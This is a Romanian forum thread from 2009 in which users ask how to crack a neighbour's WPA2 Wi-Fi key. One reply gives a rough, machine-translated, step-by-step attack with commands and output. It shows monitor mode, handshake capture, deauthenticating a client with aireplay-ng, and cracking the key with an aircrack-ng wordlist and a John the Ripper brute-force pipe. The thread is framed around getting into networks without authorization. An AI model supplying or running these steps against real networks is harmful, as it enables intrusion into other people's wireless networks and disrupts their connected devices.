everton Posted November 11, 2009 Report Posted November 11, 2009 Salut , este vreo modalitate sa se poata afla security key la un wireless wpa 2?va multumesc in avans Quote
Birkoff Posted November 11, 2009 Report Posted November 11, 2009 wpa2 din cate stiu e cea mai greu de spart in momentul de fata, nu am auzit pe nimeni sa fi reusit sa o sparga inca Quote
Nytro Posted November 11, 2009 Report Posted November 11, 2009 http://www.aircrack-ng.org/Dar nu stiu daca merge si pentru WPA2. Quote
zippy Posted November 12, 2009 Report Posted November 12, 2009 Cu BackTrack cred...erau multe tutoriale pe youtube Quote
SympleBoy22 Posted November 12, 2009 Report Posted November 12, 2009 Am si eu unu prin bloc care tot mi-l detecteaza ca "wirelessul meu" ( asta e denumirea ).Banuiesc ca este al unui vecin dar cum ma conectez la el?Are o raza de transmitere asa de mare?p.s:Acum nu mai este online ca sa va spun ce tip este dar revin cu un edit. Quote
neox Posted November 21, 2009 Report Posted November 21, 2009 În primul rând, pune carte în modul de a monitoriza:root@bt:~# airmon-ng Interface Chipset Driverwifi0 Atheros madwifi-ngath0 Atheros madwifi-ng VAP (parent: wifi0)ath1 Atheros madwifi-ng VAP (parent: wifi0)wlan0 Ralink 2573 USB rt73usb - [phy0]root@bt:~# airmon-ng start wlan0Interface Chipset Driverwifi0 Atheros madwifi-ngath0 Atheros madwifi-ng VAP (parent: wifi0)ath1 Atheros madwifi-ng VAP (parent: wifi0)wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0)-----------------------------------------------------------------Ok, putem folosi acum interfa?? mon0S? g?seasc? o re?ea f?r? fir care utilizeaz? WPA2 / PSKroot@bt:~# airodump-ng mon0 CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet--------------------------------------------------------------------------------Stop airodump-ng ?i rulazel din nou, scris toate pachetele de pe disc:airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2------------------------------------------------------------------------În acest moment, ave?i 2 op?iuni: fie a?tepta?i pân? când un client se conecteaz? ?i 4-way handshake este complet, sau deauthenticate un client existent ?i, astfel, for?a s? reassociate. deci s? vigoare deauthenticate. Avem nevoie de bssid de AP (-a) ?i MAC a unui client conectat (-c)---------------------------------------------------------------------------------root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon013:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 1013:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]----------------------------------------------------------------------------------Ca rezultat, airodump-ng ar trebui s? indice "WPA Handshake:" în col?ul din dreapta sus CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230 -----------------------------------------------------------------------Stop airodump-ng ?i asigura?i-v? c? dosarele au fost create în mod corespunz?torroot@bt:/# ls /tmp/wpa2* -al-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv----------------------------------------------------------------------------Deci, dac? wordlist este denumit word.lst (în conformitate cu / tmp / wordlists), ai posibilitatea s? executiaircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap---------------------------------------------------------------------------------Succesul cracare cheie WPA2 PSK este direct legat? de for?a de fi?ier parola. Cu alte cuvinte, poate ai noroc si sa-cheie foarte rapid, sau posibil s? nu ob?ine?i cheia la toate.A doua metoda (bruteforcing) va fi de succes pentru sigur, dar poate dura vârstele pentru a finaliza. P?stra?i în minte, o cheie WPA2 poate fi de pân? la 64 de caractere, astfel încât, în teorie, ar tine de a construi în fiecare combina?ie parol? cu toate seturile de caractere posibile în Aircrack. Dac? utiliza?i John the Ripper pentru a crea toate combina?iile posibile parola în Aircrack-ng, aceasta este comanda de a folosi:root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7---------------------------------------------------------------------------------------8 caractere, caractere simplu (litere mici ?i majuscule) sau cifre = fiecare personaj în cheie ar putea dispune de 26 26 10 (62) de combina?ii posibile. Deci, num?rul maxim de combina?ii care trebuie s? fie verificate în procesul de Bruteforce este de 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 La aproximativ 600 de chei pe secund? pe lent meu "" de sistem, ar putea dura mai mult decât 101083382 or? pentru a g?si cheie (11539 ani). Eu am oprit procesul de cracare ca masina mea este prea mod lent la spre crack-cheie în timp ce eu sunt înc? în via?? ... Deci, cred c? despre asta atunci cand faceti o WPA2 PSK de audit.asta ii teorie dar la wpa ii greu sa gasesti la wpa2 tot asa sansa ii mica de tot Quote